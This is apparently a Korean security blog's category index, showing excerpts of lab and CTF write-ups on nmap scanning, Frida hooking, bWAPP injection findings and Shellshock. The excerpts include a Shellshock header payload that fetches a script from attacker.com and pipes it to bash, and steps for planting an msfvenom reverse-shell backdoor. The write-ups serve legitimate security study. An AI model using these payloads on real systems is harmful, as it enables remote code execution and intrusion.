Programming/hacking

■ 서비스별 기본 포트FTP21File TransferCleartextFTPS990File TransferEncryptedHTTP80Worldwide WebCleartextHTTPS443Worldwide WebEncryptedIMAP143Email (MDA)CleartextIMAPS993Email (MDA)EncryptedPOP3110Email (MDA)CleartextPOP3S995Email (MDA)EncryptedSFTP22File TransferEncryptedSSH22Remote Access and File TransferEncryptedSMTP25Email (MTA)CleartextSMTPS465Email (MTA)EncryptedTelnet23Remote AccessCleartext■ Hyd..
■ 네트워크 별 포트스캔 명령어포트 스캔 유형예제 명령TCP 널 스캔sudo nmap -sN 10.201.116.24TCP FIN 스캔sudo nmap -sF 10.201.116.24TCP 크리스마스 스캔sudo nmap -sX 10.201.116.24TCP 마이몬 스캔sudo nmap -sM 10.201.116.24TCP ACK 스캔sudo nmap -sA 10.201.116.24TCP 윈도우 스캔sudo nmap -sW 10.201.116.24사용자 정의 TCP 스캔sudo nmap --scanflags URGACKPSHRSTSYNFIN 10.201.116.24스푸핑된 소스 IPsudo nmap -S SPOOFED_IP 10.201.116.24스푸핑된 MAC 주소--spoof-mac SPOOFED_M..
DVWA Mobile은 Flutter + SQLite 기반의 교육용 취약점 실습 앱입니다.1장에서는 의도적으로 취약한 로그인 기능을 구현해 SQL Injection의 구조적 위험을 이해할 것🗂️ 프로젝트 개요목표: 로그인 화면을 만들고, SQL 쿼리 문자열을 그대로 합쳐서 왜 위험한지 학습구성 요소main.dart : 앱 엔트리포인트login_page.dart : 로그인 UI + 취약한 인증 로직db.dart : SQLite 초기화 및 seed 데이터board_page.dart : 로그인 성공 후 이동할 화면⚙️ 개발 환경항목버전 / 내용Flutter3.x 이상패키지sqflite, path, path_providerDBSQLite (앱 내부)테스트Android Emulator / 실기기 의존성 추가 (..
1. 프로젝트 개요웹 해킹 학습용으로 널리 알려진 **DVWA(Damn Vulnerable Web Application)**를 모바일 환경에 이식해보고자 했다.실무에서 모바일 앱 보안 진단을 하다 보면 Burp Suite 프록시를 통한 트래픽 분석이 필수적인데,연구·교육용으로 쓸만한 취약한 모바일 앱 환경은 거의 없었다.그래서 Flutter + Dart 기반으로 간단한 앱을 제작하고,의도적으로 SQL Injection, XSS, CSRF, File Upload 취약점을 심어 학습 환경을 구성했다.2. 아키텍처 구상이번 프로젝트는 두 가지 방식으로 설계가 가능하다.A안 (순수 Flutter + SQLite)앱 내부 DB(SQLite)를 직접 호출하면서 검증 없는 rawQuery와 필터링 없는 출력으로 취약..
금번 포스트는 드림핵 웹 CTF 문제인 Test Your Luck 문제를 풀이한다 . 1. 문제 검색링크로 들어 갈 시 Test Your Luck 이라는 인풋창과 반환값은 10초 뒤에 나온다는 문구가 적혀있음해당 페이지를 크롬 개발자 도구로 소스를 볼 시 태그 안 Post 요청을 보내는 메소드를 확인 할 수 있는데 매 요청 시 10초의 타임아웃이 걸리고 /guess 라는 url로 요청을 보내는 것 을 확인 할 수 있음.서버 코드는 유저의 입력값을 받아 랜덤 한 값과 비교하여 맞을 시에 플래그를 출력해주는 기능을 함.2. 문제풀이외부에서 요청을 보내 타임아웃 우회 및 브루트 포스 공격시도 2.1. 브루트포스를 위한 코드 제작 및 공격tqdm 을 통한 실시간 진행사항 확인 및 브루트 포스 공격 import ..
🔍 실습 목표OWASP의 안드로이드 보안 학습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 앱 내부의 함수 로직을 후킹하고,UI를 통해 입력된 값을 검증하는 비밀키 비교 로직을 분석 및 복호화하는 것이 목적임.이를 통해 동적 분석 기법 및 런타임 코드 조작에 대한 실습 경험을 쌓는 것이 목표임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅된 기기에서 실행 시 종료됨주요 특징:루팅 탐지 기능이 포함되어 있어, Frida 사용 전 우회가 필요함특정 문자열 입력 시 내부적으로 비밀키 비교가 수행되며, 일치 여부에 따라 "Success!" 또는 "Try again." 메시지를 출력함비밀키는 하드코딩되어 있지..
UnCrackable Level 1 실습 – Frida로 안드로이드 앱 후킹🔍 실습 목표OWASP에서 제공하는 안드로이드 보안 실습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 루팅 탐지를 우회하고 앱의 내부 로직을 분석해보는 것임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅 디바이스에서 실행 시 자동 종료됨이 앱은 루팅된 환경을 탐지하고 종료시키는 보안 로직이 탑재되어 있어,보안 우회 기법을 익히기에 적절한 실습 대상임.루팅 탐지 우회앱을 실행하면 아래와 같은 메시지를 출력하며 종료됨:"Root detected! App is closing..."내부적으로는 다음과 같은 조건들을 체크함:Build...
취약점PHP Code Injection위험도상상세경로( URL )192.168.2.9/bWAPP/phpi.php취약점 시나리오[1단계] 시스템 명령어 실행 가능 여부 확인웹 페이지 상에서 사용자 입력을 통해 시스템 명령어(`whoami`, `id` 등)의 실행이 가능한 것을 확인함.이는 명령어 삽입(Command Injection) 취약점에 해당하며, 시스템 권한 탈취의 첫 단초가 됨. [2단계] `msfvenom`을 활용한 백도어 생성공격자는 `msfvenom` 도구를 활용해 리버스 셸 형식의 백도어 파일 생성. 해당 코드 블록은 아래 테이블 참조.생성된 파일은 ELF 포맷으로, 리눅스 기반 서버에서 실행 가능함. [3단계] 웹 서버로 백도어 업로드취약한 파일 업로드 기능 혹은 명령어 삽입을 통해 `b..
취약점SQL Injection / GET, POST위험도상상세경로( URL )192.168.2.9/bWAPP/sqli_1.php || sqli_6.php취약점 개요SQL Injection은 사용자 입력값이 데이터베이스 쿼리에 직접 삽입될 때 발생하는 취약점으로, 공격자가 악의적인 SQL 명령을 주입해 인증 우회, 데이터 조회 및 조작 등이 가능함. 입력값 검증 없이 SQL 쿼리에 포함되면 쿼리 구조가 조작되어 의도치 않은 결과를 초래하게 됨. Prepared Statement 사용, 입력값 이스케이프, 화이트리스트 검증 등을 통해 방어할 수 있음.수행 결과 7.1) GET 요청에서 따옴표와 주석을 사용한 악의적인 SQL문 동작수행 점검그림 7.1.1 – GET 요청 테이블의 정상 동작 모습 > 그림 7...
1. HTML Injection – Reflected ( GET )취약점HTML Injection – Reflected ( GET )위험도상상세경로( URL )192.168.2.9/bWAPP/htmli_get.html취약점 개요사용자의 입력값이 필터링 없이 HTML에 삽입되어, 태그나 스크립트가 그대로 실행되는 취약점, GET 방식으로 전달된 파라미터가 즉시 반영되며, XSS로 이어질 수 있어 위험함으로.htmlspecialchars() 등으로 출력 시 이스케이프 처리해 예방권고수행 결과1.1) Input Box 에서 HTML 태그를 삽입하였을 시 화면 표출 점검그림 1.1.1 - Input Box HTML 태그 삽입 > 그림 1.1.2 - HTML 태그가 인코딩 되어 전달되는 모습 >그림 1.1.3..
금번엔 프리다랩에서 제공해주는 취약점 문제 apk를 가지고 문제 풀이를 진행하려고함프리다랩 apk는 하기의 사이트에서 제공해줌https://rossmarks.uk/blog/fridalab/ FridaLabI was struggling with a recent test using frida, knowing it could do what I want but unsure how. After lots of googling and trial and error I eventually got it working. So I decidedrossmarks.uk 준비물 1. 프리다가 설치 된 파이썬 가상환경2. jadx3. 녹스 플레이어4. fridalab.apk 프리다랩 세팅1. 프리다랩 설치 1.1. 받은 프리다랩 a..
■ Shell Shock - 발견 시기 : 2014년- 영향받는 프로그램 : Bash ( 리눅스/유닉스에서 기본적으로 쓰이는 쉘)- 취약점 번호 : CVE-2014-6271 외 다수- 설명 :Bash가 환경변수에 악성 코드를 몰래 심을 수 있게 허술하게 파싱하여 이로 비롯해 서버에 악성 환경변수만 심어주면, 원격 코드 실행 (RCE) 가능웹서버, SSH, DHCP 서버 같은 Bash 를 사용하는 프로그램 위협 공격 예시User-Agent: () { :; }; /bin/bash -c "curl http://attacker.com/malware.sh | bash"■ 대상- shell shock 취약점이 있는 사이트- 힌트에 referer header 에 취약점이 있다는 것을 알 수 있음 referer hea..
김제주
'Programming/hacking' 카테고리의 글 목록